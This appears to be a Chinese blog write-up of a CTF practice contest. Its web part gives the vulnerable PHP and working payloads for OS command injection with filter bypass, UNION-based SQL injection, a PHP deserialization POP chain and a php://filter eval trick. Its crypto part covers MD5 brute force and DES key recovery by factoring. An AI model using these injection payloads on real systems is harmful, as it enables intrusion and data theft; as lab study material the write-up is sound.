人文练习赛20240421wp(web-crypto)

已于 2024-04-22 12:59:46 修改
阅读量619 收藏 25
点赞数 28
文章标签: 网络安全
于 2024-04-21 20:59:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75812594/article/details/138042161
版权

web

ping(20240421)

题目源码参考:

<?php
    if (isset($_POST['ip'])) {
        $input = $_POST['ip'];
        $rep = array('&',';',' ','$');
        $input = str_replace($rep, '', $input);
        $command = "ping -c 4 $input";
        $output = shell_exec($command);
        echo "<pre>$output</pre>";
    }
    ?>

题解:

首先输入一个正确的ip或域名,会出现如下回显。

这里我不在进行黑盒测试,通过上面的源码,这几个符号被过滤。(做题时没有源码,需一个一个测试)

'&',';',' ','$'

但过滤不严格,我们可以通过'||'来进行绕过。(前提条件,在前一个命令执行错误时执行后一个命令)

playload:

查看目录
111||ls

查看flag(由于过滤了空格,所有用{command,param}方式。还有${IFS}等都可以绕过空格。)
111||{cat,fl4g_1s_te8t.php}

最后查看网页源代码即可获取flag

sql(20240421)

本题源码展示。(做题时没有)
<?php
error_reporting(0);
include('sql-connet.php');

$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {
    die($conn->connect_error);
}
$user_id = $_GET['user_id'];
if(!isset($user_id)){
    echo "<center>input get user_id......</br></center>";
    exit();
}
$user_id = str_replace(' ','',$user_id);
$user_id = str_replace('*','',$user_id);
$user_id = str_replace('-','',$user_id);
$user_id = str_replace('\'','',$user_id);
$sql = "SELECT username,password FROM `users` WHERE id=\"$user_id\" limit 0,1";
echo "<center>SQL query:".$sql."</center>";
$result = $conn->query($sql);

if ($result->num_rows > 0) {
    $row = $result->fetch_assoc();
    echo "<center></br>username: " . $row["username"]."</br></center>";
    echo "<center></br>password: " . $row["password"]."<center>";
}

$conn->close();
?>

打开题目首先看到

input get user_id......

所有按要求在url栏用get提交一个?user_id=1。得到如下结果

 更具SQL query我们得知了题目的sql语句:?user_id=1" order by 4%23

 但结果为,空格不见了,得知过滤了空格。

SQL query:SELECT username,password FROM `users` WHERE id="1"orderby4#" limit 0,1

后面的更具上面的源码可得到过滤的字符,这里不再测试了。直接上playload

空格我们用%0a来进行绕过,还有其他的,自查。

爆字段(<=正确字段有回显,>则没有回显)
?user_id=1"%0aorder%0aby%0a2%23

爆库名
?user_id=999"%0aunion%0aselect%0a1,database()%23
得到库名security

爆表命
?user_id=999"%0aunion%0aselect%0a1,(select%0agroup_concat(table_name)from%0ainformation_schema.tables%0awhere%0atable_schema=database())%23
得到表明FLAG,emails,referers,uagents,users

爆字段
?user_id=999"%0aunion%0aselect%0a1,(select%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name="FLAG")%23
得到字段f4lg

爆数据
?user_id=999"%0aunion%0aselect%0a1,(select%0af4lg%0afrom%0aFLAG)%23
得到flag为yami{sqi_very_easy_123456admin}

此题方法很多,也可以试试sqlmap 

ser(20240421)

<?php
/** php version 5.6
 * flag in ./flag.php
 */
highlight_file(__FILE__);
error_reporting(0);
class W1nner{
    public $h1;
    public $h2;

    public function __destruct()
    {
        $this->h1->serser($this->h2);
    }
}

class err0r{

    public function __call($name,$args){
        print($args[0]['cbkyami']);
    }
}

class yami{
    public $cmd;

    public function __toString(){
        passthru($this->cmd);
    }
}

unserialize($_GET['yami_yami.yami']);

?>

php反序列化,读源码可得,用get提交一个 

?yami[yami.yami

但在php变量里,不允许出现"_",根据提示php version 5.6,小于8(记不清了)。

php会把"["解析成为"_",且后面的保持不变,所有在这里我们输入

yami[yami.yami

绕过限制。

接下来就是构造pop链:

读源码可知,我们需要执行passthru($this->cmd);

我们只要(php魔术方法这里不展开谈)

W1nner->h2->err0r->__call->yami->__toString

playload: 

<?php
 
class W1nner{
    public $h1;
    public $h2;
 
}
 
class err0r{
}
 
class yami{
    public $cmd='cat ./flag.php';
}
 
$a=new W1nner();
$a->h1=new err0r();
$a->h2=['cbkyami'=>new yami()];
 
echo serialize($a);

输入以下playload,查看源代码即可获取flag 

?yami[yami.yami=O:6:"W1nner":2:{s:2:"h1";O:5:"err0r":0:{}s:2:"h2";a:1:{s:7:"cbkyami";O:4:"yami":1:{s:3:"cmd";s:14:"cat ./flag.php";}}}

 base_cover(20240421)

<?php
error_reporting(0);
highlight_file(__FILE__);

function waf($waf){
    if(preg_match_all('/base64/',$waf)){
        return $waf;
    }else{
        return 0;
    }
}

function waf2($cmd){
    $replace_chars = array('flag', 'cat', 'tac', 'more', 'less', '*','$','nl', '\'');
    foreach ($replace_chars as $char) {
        $cmd = str_ireplace($char, "", $cmd);
    }
    return $cmd;
}

$name = waf($_GET['name']);
$yami = $_GET['yami'];
if(isset($name)&&isset($yami)){
    $content='ctf_intersting_ctf'.$yami;
    if ($name!==0){
        file_put_contents("$name.txt",$content);
    }
    $tmp = file_get_contents('system.txt');
    echo $tmp."</br>";
    $cmd = waf2(waf2($_GET['cmd']));
    echo $cmd;
    if ($cmd){
        eval($tmp($cmd));
    }
    file_put_contents("system.txt","");
}
?>

审计代码,找到我们的利用点在eval()函数 

两个waf比较简单,第一个为检测我们输入是否含有base64关键字,第二个就是将$replace_chars有的关键字进行替换为空。

file_put_contents("$name.txt",$content);

将$content的内容写入文件中,内容为ctf_intersting_ctf+我们通过$yami输入的值,而文件名则为$name输入的值。

$tmp = file_get_contents('system.txt');

eval()里面有两个变量,分别为$tmp、$cmd,毋庸置疑我们需要构造一个能执行系统命令的函数。如system()、passthru、exec等等。

唯一的问题就是,$tmp的获取是通过上面函数读取,但里面有一个无用的值,'ctf_intersting_ctf'。

这里我直接给出如和绕过的playload:(原理可以自查)

<?php
$a='system';
$a=iconv('utf-8','utf-16',base64_encode($a));
$a=quoted_printable_encode($a);
echo $a;
name=php://filter/convert.quoted-printable-decode/convert.iconv.utf-16.utf-8/convert.base64-decode/resource=system
yami=FF=FEc=003=00l=00z=00d=00G=00V=00t=00

 即可将我们想执行的系统命令函数上传,将原来的值清空。

最后的cmd就很简单了,可以用双写绕过,但需要写两次,因为被两个waf包裹

cmd=caccatatt flflflagagag.php

这样即可获取flag,也许查看源代码

crypto

login_ctfd.othing.xyz(20240421)

此题没有什么好说的,简单

md5(123456xxxsu789)=ce07a3bc116a4d6d7a7b285954e246bd

只需要爆破xxx即可(因为比较简单,计算量不大)

<?php
$b='ce07a3bc116a4d6d7a7b285954e246bd';
for($i=32;$i<128;$i++){
    for($j=32;$j<128;$j++){
        for($k=32;$k<128;$k++){
            $c=chr($i).chr($j).chr($k);
            $a="123456$c"."su789";
            if(md5($a)==$b){
                echo $a;
                exit;
            }
        }
    }
}
123456md5su789

提交后在url栏即可看到flag

des(20240421)

from Crypto.Cipher import DES
from Crypto.Random import get_random_bytes
from Crypto.Util.number import bytes_to_long, long_to_bytes, getPrime

key = long_to_bytes(getPrime(64))
iv = get_random_bytes(8)
print('acc:', bytes_to_long(key)*bytes_to_long(iv))

m = 'flag{xxxxxxxxxxxxxxxxxxxxxx}'
plaintext = (m + (8 - len(m) % 8) * '1')
cipher = DES.new(key, DES.MODE_CBC, iv)
ciphertext = cipher.encrypt(plaintext.encode())
print("c:", ciphertext)

'''
acc: 44002867044872067088796889440883670814
c: b'\xfe\xc6\xb8\xc1\xedgE \x86\xec7\xf1\xa80\x033\x0eM\xeb\xcc\xe8|\xecV\xabC0\x8cX\x06bv\xc5 \x07<w\xb9\xb2\xfe'
'''

关键点就在于acc 

他的计算方式是一个64位的素数*随机8字节的iv

那么我们只需要把acc进行分解就能得到key和一堆iv的因子,将除了key的所有数相乘就是iv。

在线素因数分解factordb.com,也可以用yafu来进行

我这里用的yafu
P1 = 2
P4 = 1931
P8 = 75839683
P8 = 11789131
P20 = 12743549263990679789

完整的playload:

from Crypto.Cipher import DES
from Crypto.Util.number import long_to_bytes

acc = 44002867044872067088796889440883670814
c = b'\xfe\xc6\xb8\xc1\xedgE \x86\xec7\xf1\xa80\x033\x0eM\xeb\xcc\xe8|\xecV\xabC0\x8cX\x06bv\xc5 \x07<w\xb9\xb2\xfe'
P1 = 2
P4 = 1931
P8 = 75839683
P9 = 11789131
key = 12743549263990679789
assert P1 * P4 * P8 * P9 * key == acc# 验证一下
key_hex = long_to_bytes(key)
iv = P1 * P4 * P8 * P9
iv_hex = long_to_bytes(iv)
decrypto = DES.new(key_hex, DES.MODE_CBC, iv_hex)
m = decrypto.decrypt(c)
print("m:", m)
m: b'flag{des_Function_encrypto_decrypto}1111'

心故
关注
  • 28
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
charm-crypto安装(一)
m0_47659650的博客
04-04 5666
charm-crypto安装记录 安装基础依赖 1.检查gcc、make、perl gcc -v make -v perl -v 对应版本信息: 附安装指令 sudo apt-get install gcc make perl 2.安装依赖库m4、flex、bison sudo apt-get update sudo apt-get install m4 flex bison 3.安装python依赖包 运行以下指令进行安装: sudo apt-get install python3-setupto
Linux安装Charm-crypto环境详细流程
fa1c4的blog
04-06 4341
前言 安装Charm-crypto踩了很多坑, 所以有必要总结成一篇文章, 好吧, 其实我学什么都总(shui)结成文章 根据官方文档 根据Python的库文档 都不能正确安装, 主要是跟版本有关, 官方文档是12年最后一次更新, 没有继续维护了, 所以很废! 不能适用不停更新的依赖环境, 比如需要的openssl, PBC, GMP, Python都是在停更之后继续更新的, 所以根据10年前的文档自然不好装. 不过charm-crypto后续也是有更新的, 但是文档没有跟进, 迷惑… 安装流程 在Ubun
Charm-crypto的安装与使用
qq_37272891的博客
08-15 1万+
Charm简介 Charm是Joseph A. Akinyele等在2013提出的一个用于进行快速加密的平台(Python库),再Charm平台里有着各种工具包能够进行加密,解密等,具体包括IBE,ABE,AES,DES,RSA等对称以及非堆成加密。 Charm是一个基于Python的开源项目,项目地址,最底层使用斯坦福大学的PBC库,用于配对运算;以及大数运算GMP库,用于大数运算。 在Cha...
charm-crypto 介绍
lurenyi0724的博客
12-15 6534
charm因为提供python接口,可以很方便地实现各种密码算法,尤其是复现论文中提出的相关算法。当然比较经典的算法它的schemes中也集成了。本文简单介绍charm的使用。
VUE使用 sm-crypto 加解密以及签名验签遇到的坑 (后端java)
热门推荐
weixin_39475476的博客
12-23 2万+
1.首先 一步一步来 安装国密 npminstall--savesm-crypto 2.具体方法都有NPM 上都有 国密即国家密码局认定的国产密码算法。主要有SM1,SM2,SM3,SM4。密钥长度和分组长度均为128位。 1:SM1 为对称加密。其加密强度与AES相当。该算法不公开,调用该算法时,需要通过加密芯片的接口进行调用。 2:SM2为非对称加密,基于ECC。该算法已公开。由于该算法基于ECC,故其签名速度与秘钥生成速度都快于RSA。ECC 256位(SM2采用的就是ECC...
spring-security-crypto加密模块
HSJ0170的博客
06-28 5065
<dependency> <groupId>org.springframework.security</groupId> <artifactId>spring-security-crypto</artifactId> <version>5.1.2.RELEASE</version>...
学习gm-crypt和sm-crypto加密解密的一天
Akuil的博客
11-04 6229
学习gm-crypt和sm-crypto加密解密
微信小程序——安装miniprogram-sm-crypto
月来better
07-01 7278
第一步:进入微信小程序项目目录下,输入cmd 第二步:检测是否安装npm ,执行npm -v,若显示安装版本号说明已安装,若无,需要安装node npm -v 第三步:在小程序项目目录下(app.js所在目录),打开cmd,执行npm init -y 参数 -y 表示对npm要求提供的信息,都自动按下回车键,表示接受默认值 npm init -y 第四步:执行 npm i miniprogram-sm-crypto --production 下载miniprogram依赖后,在微信开发工具中点击右上
Windows 上安装charm-crypto
weixin_49722641的博客
01-26 3464
一、预制包装 1.为Windows x64安装Python 3.5 2.下载charm-crypto-win-x64.7z 解压缩charm-crypto-win-x64.7z 并转到charm-crypto文件夹 将所有.dll文件复制到C:\Windows\System32。 **文件在我的资源里** 3.easy_install 的安装https://pypi.python.org/pypi/ez_setup下载 ez_setup.py 到桌面后,按住键盘的 shift 键,右击鼠标,选中“在此处打
BUUCTF·[ACTF新生赛2020]crypto-rsa0·WP
sm1918451478的博客
10-19 835
[ACTF新生赛2020]crypto-rsa0·WP
sm-crypto-master.zip
12-17
国密算法SM2公私钥加解密及签名验签以及前端js sm-crypto,附件说明及参考及测试方法;
commons-crypto-1.0.0-API文档-中文版.zip
05-02
赠送jar包:commons-crypto-1.0.0.jar; 赠送原API文档:commons-crypto-1.0.0-javadoc.jar; 赠送源代码:commons-crypto-1.0.0-sources.jar; 赠送Maven依赖信息文件:commons-crypto-1.0.0.pom; 包含翻译后的API...
spring-security-crypto-5.5.2-API文档-中文版.zip
06-04
赠送jar包:spring-security-crypto-5.5.2.jar; 赠送原API文档:spring-security-crypto-5.5.2-javadoc.jar; 赠送源代码:spring-security-crypto-5.5.2-sources.jar; 赠送Maven依赖信息文件:spring-security-...
spring-security-crypto-5.6.1-API文档-中文版.zip
05-04
赠送jar包:spring-security-crypto-5.6.1.jar; 赠送原API文档:spring-security-crypto-5.6.1-javadoc.jar; 赠送源代码:spring-security-crypto-5.6.1-sources.jar; 赠送Maven依赖信息文件:spring-security-...
Charm-Crypto-0.43_Python3.tar.gz
08-15
**Charm-Crypto-0.43_Python3.tar.gz** 是一个包含了Charm加密库的版本0.43的压缩文件,专为Python 3编程语言设计。这个库为开发者提供了一整套强大的加密工具,包括了身份基加密(IBE)、属性基加密(ABE)以及对称...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
方案-基于云架构的校园信息化建设方案.pdf
最新发布
07-29
方案-基于云架构的校园信息化建设方案.pdf
【创新未发表】Matlab实现蛇群优化算法SO-Kmean-Transformer-LSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现北方苍鹰优化算法NGO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
hutool-crypto版本3
03-06
Hutool-Crypto是一个Java加密工具库,提供了常用的加密算法和工具类。关于Hutool-Crypto版本3的介绍如下: 1. 版本3是Hutool-Crypto的最新版本,它在之前版本的基础上进行了一些改进和优化。 2. Hutool-Crypto版本3...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值